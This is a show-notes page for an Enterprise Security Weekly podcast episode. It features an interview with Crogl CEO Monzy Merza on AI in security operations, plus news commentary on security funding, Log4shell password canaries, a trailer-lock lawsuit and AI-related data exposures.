Monzy Merza, How Much AI is Too Much, and the Weekly News – Monzy Merza – ESW #415
Segment 1: Interview with Monzy Merza - There is a Right and Wrong Way to use AI in the SOC
In the rush to score AI funding dollars, a lot of startups build a basic wrapper around existing generative AI services like those offered by OpenAI and Anthropic. As a result, these services are expensive, and don't satisfy many security operations teams' privacy requirements.
This is just the tip of the iceberg when discussing the challenges of using AI to aid the SOC. In this interview, we'll dive into the challenge of finding security vendors that care about security, the need for transparency in products, the evolving shared responsibility model, and other topics related to solving security operations challenges.
Segment 2: Topic Segment - How much AI is too much AI?
In the past few weeks, I've talked to several startup founders who are running into buyers that aren’t allowed to purchase their products, even though they want them and prefer them over the competition. Why? No AI and they’re not allowed to buy.
Segment 3: News Segment
Finally, in the enterprise security news,
- We cover the latest funding
- The Trustwave saga comes to a positive end
- Android 16 could help you evade law enforcement
- Microsoft is kicking 3rd party AV out of the kernel
- Giving AI some personality (and honesty)
- Log4shell canaries reveal password weirdness
- Denmark gives citizens copyright to their own faces to fight AI
- McDonald’s has an AI whoopsie
- Ingram Micro has a ransomware whoopsie
- Drama in the trailer lock industry
All that and more, on this episode of Enterprise Security Weekly.
Monzy Merza is a cybersecurity leader and researcher with deep expertise in security strategy, threat intelligence, and go-to-market execution. He is the Co-Founder and CEO of Crogl, Inc.
With early career experience in U.S. government cybersecurity research, Monzy is a prolific public speaker and a passionate advocate for security practitioners. Before founding Crogl, he joined the security team at a Fortune 100 bank to gain firsthand experience of the challenges security teams face daily.
Previously, Monzy served as VP of Security GTM at Databricks, where he incubated the company’s security business. Prior to that, he spent nearly a decade at Splunk in security research, product strategy, and evangelism, ultimately leading as VP, Head of Security Research. He spearheaded research initiatives adopted by thousands of customers, shaped Splunk’s $1B+ security portfolio, and significantly expanded its industry influence.
Adrian Sanabria
- FUNDING: Courtesy of the Security, Funded newsletter, issue #201 – Flip It and Reverse It
Last week's vibe check asked, "What’s the biggest distraction pulling security teams away from real progress?"
The winner was "endless compliance work", followed closely by "chasing every new vuln".
FUNDING
- Zscaler, a United States-based suite of secure access service edge and networking tools, raised a $1.5B post-IPO debt round.
- Cato Networks, an Israel-based secure access service edge (SASE) platform, raised a $359.0M Series G from Vitruvian Partners and ION Crossover Partners.
- XBOW, a United States-based autonomous application security testing platform, raised a $75.0M Series B from Altimeter Capital.
- DataBahn, a United States-based security log data management platform, raised a $17.0M Series A from Forgepoint Capital.
- Bonfy.AI, a United States-based AI-enabled data loss prevention platform focused on securing content generated by Generative AI, raised a $9.5M Seed from TLV Partners. (more)
- Command Zero, a United States-based security operations and investigation platform, raised a $5.0M Venture Round. (more)
ACQUISITIONS
- Trustwave, a United States-based managed security services provider (MSSP), was acquired by LevelBlue for an undisclosed amount. Trustwave had previously raised $10.0M in funding. <- something good came out of the failed merger with Cybereason!
- NEW PRODUCTS: Datadog Unveils Latest AI Agents to Rapidly Resolve Application Issues
- NEW FEATURES: Android 16’s advanced stingray protection is ready for action
- NEW FEATURES: Microsoft is moving antivirus providers out of the Windows kernel
- ESSAYS: Personality of AI Security Agents
A great fundamental point made here by my friend Nipun: it is very easy to customize the output, or "personality" of large language models, so why don't we do that to remind folks of generative AI's tendency to confidently get things wrong?
It's a really good point, and I don't have a good answer for why no one seems to be doing this.
- DUMPSTER FIRE: Rob Fuller and His Log4shell Canaries
This is WILD. Here's the content of the tweet:
_ I use Log4shell canaries in my passwords and I have one per website. It’s been crazy interesting the sites that I have gotten pings for and where the pings are from. I think it’s cool. It would be a fun talk to put together and a good story to tell but not useful _
WILD BIT #1: That Rob Fuller puts Log4shell exploits in his passwords. But of course he does! I can't be too surprised.
WILD BIT #2: That he is getting "pings" off his passwords. For this to be possible, two things need to happen:
- A vulnerable version of log4j is reading the exploit string as input
- The password is handled or logged in plain text in order for a log4j function to be able to read it
- SQUIRREL: The Best Trailer Locks?
So there's a lock manufacturer, Proven Industries They sell trailer locks. They claim to sell "the most effective and secure products in the industry." They even have YouTube videos showing them physically destroy their competitors' products to highlight how secure their products are.
Turns out that "built with strong materials" and "secure" are different goals and outcomes when manufacturing physical security products, like locks.
Trevor McNally, the guy behind Covert Instruments, which sells all sorts of lockpicking and bypass tools for physical assessments, has a YouTube channel: McNallyOfficial. The content is very similar to the very popular Lockpicking Lawyer: short tutorials on how to bypass common (and sometimes not-so-common) locks.
It seems he hit a nerve with Proven Industries, and they claimed he faked his videos. He says they texted his wife, asked him to apologize, and are now suing him. He reacted exactly as you thought he might: buying up every one of their products he can find, and bypassing them all in under 5 seconds. He has released 6 short videos in the last month where he savagely opens dozens of Proven Locks quicker than you or I could open them with a proper key.
My theory: this won't end well for Proven Industries, the Streisand Effect is a thing and all companies would do well to remember this.
UPDATE: Proven has dropped their lawsuits against Trevor.
Sean Metcalf
- REGULATIONS: Denmark Is Fighting AI by Giving Citizens Copyright to Their Own Faces
ADRIAN'S COMMENTS: It's always interesting when good old legal systems become the innovation the public needs to protect themselves from the tech industry.
SEAN'S COMMENTS: Perhaps the US should follow suit?
- AI WHOOPSIE: McDonald’s AI Hiring Bot Exposed Millions of Applicants’ Data to Hackers Who Tried the Password ‘123456’
ADRIAN'S COMMENTS: I swear, every time anything LLM-based is exposed to the public Internet, it seems to go off the rails. I'm not sure this is much worse than the normal hell hourly workers go through when attempting to apply for a job though.